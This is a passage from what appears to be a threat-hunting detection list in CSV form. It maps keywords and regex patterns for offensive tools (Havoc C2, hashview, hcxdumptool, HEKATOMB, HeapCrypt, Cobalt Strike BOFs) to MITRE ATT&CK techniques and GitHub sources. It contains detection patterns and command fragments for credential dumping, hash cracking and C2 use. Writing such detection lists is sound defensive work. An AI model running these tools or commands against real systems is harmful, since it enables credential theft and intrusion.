Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*hashonymize --ntds * --kerberoast *",".{0,1000}hashonymize\s\-\-ntds\s.{0,1000}\s\-\-kerberoast\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*HashPals/Name-That-Hash*",".{0,1000}HashPals\/Name\-That\-Hash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*--hash-type 1000 --potfile-path*.ntds.cracked*",".{0,1000}\-\-hash\-type\s1000\s\-\-potfile\-path.{0,1000}\.ntds\.cracked.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hashview*@*localhost*",".{0,1000}hashview.{0,1000}\@.{0,1000}localhost.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview/config.conf*",".{0,1000}hashview\/config\.conf.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview/hashview*",".{0,1000}hashview\/hashview.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview-agent.*.tgz*",".{0,1000}hashview\-agent\..{0,1000}\.tgz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*hashview-agent.py*",".{0,1000}hashview\-agent\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*HasSPNNoPreauth*",".{0,1000}HasSPNNoPreauth.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*hatlord/snmpwn*",".{0,1000}hatlord\/snmpwn.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*havoc client*",".{0,1000}havoc\sclient.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*havoc server*",".{0,1000}havoc\sserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.agent*",".{0,1000}havoc\.agent.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc.git*",".{0,1000}Havoc\.git.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - 
T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc.hpp*",".{0,1000}Havoc\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.service*",".{0,1000}havoc\.service.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc.yaotl*",".{0,1000}havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/Client*",".{0,1000}Havoc\/Client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - 
T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/cmd/*",".{0,1000}Havoc\/cmd\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/payloads*",".{0,1000}Havoc\/payloads.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/pkg*",".{0,1000}Havoc\/pkg.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Havoc/Teamserver*",".{0,1000}Havoc\/Teamserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_agent.py*",".{0,1000}havoc_agent\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_agent_talon.*",".{0,1000}havoc_agent_talon\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_default.yaotl*",".{0,1000}havoc_default\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_externalc2*",".{0,1000}havoc_externalc2.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc_service_connect*",".{0,1000}havoc_service_connect.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc-c2-client*",".{0,1000}havoc\-c2\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havoc-c2-data*",".{0,1000}havoc\-c2\-data.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*havocframework.com*",".{0,1000}havocframework\.com.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocService*",".{0,1000}HavocService.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocTalonInteract*",".{0,1000}HavocTalonInteract.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUi.cpp*",".{0,1000}HavocUi\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUi.h*",".{0,1000}HavocUi\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*HavocUI.hpp*",".{0,1000}HavocUI\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*hccapx2john.py*",".{0,1000}hccapx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*hci_oracle_passwords*",".{0,1000}hci_oracle_passwords.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*",".{0,1000}hcxdumptool\s\-i\swlan1\s\-o\s.{0,1000}\s\-\-active_beacon\s\-\-enable_status\=1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxdumptool*",".{0,1000}hcxdumptool.{0,1000}","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. 
Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1718","385","2024-03-12T07:32:39Z","2018-02-25T08:18:40Z" "*hcxhashtool -i *.hashcat --info stdout*",".{0,1000}hcxhashtool\s\-i\s.{0,1000}\.hashcat\s\-\-info\sstdout.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxpcapngtool --all -o *.hashcat*",".{0,1000}hcxpcapngtool\s\-\-all\s\-o\s.{0,1000}\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hcxpcapngtool -o *.hashcat *.pcapng*",".{0,1000}hcxpcapngtool\s\-o\s.{0,1000}\.hashcat\s.{0,1000}\.pcapng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*hd-launch-cmd 
*",".{0,1000}hd\-launch\-cmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*headers/exploit.h*",".{0,1000}headers\/exploit\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" 
"*headers/HandleKatz.h*",".{0,1000}headers\/HandleKatz\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*HeapCrypt-main*",".{0,1000}HeapCrypt\-main.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.cpp*",".{0,1000}HeapEncryptDecrypt\.cpp.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.exe*",".{0,1000}HeapEncryptDecrypt\.exe.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.sln*",".{0,1000}HeapEncryptDecrypt\.sln.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeapEncryptDecrypt.vcxproj*",".{0,1000}HeapEncryptDecrypt\.vcxproj.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*HeartBleed*",".{0,1000}HeartBleed.{0,1000}","offensive_tool_keyword","HeartBleed","Heart Bleed scanner ","T1222 - T1110 - T1046","TA0007 - TA0001 - TA0002","N/A","N/A","Web Attacks","https://github.com/TechnicalMujeeb/HeartBleed","1","0","N/A","N/A","1","33","12","2018-04-14T04:21:39Z","2018-04-14T04:06:16Z" "*hekatomb -hashes *",".{0,1000}hekatomb\s\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*hekatomb-*.tar.gz*",".{0,1000}hekatomb\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb*-hashes *",".{0,1000}hekatomb.{0,1000}\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb-*-py3-none-any.whl*",".{0,1000}hekatomb\-.{0,1000}\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
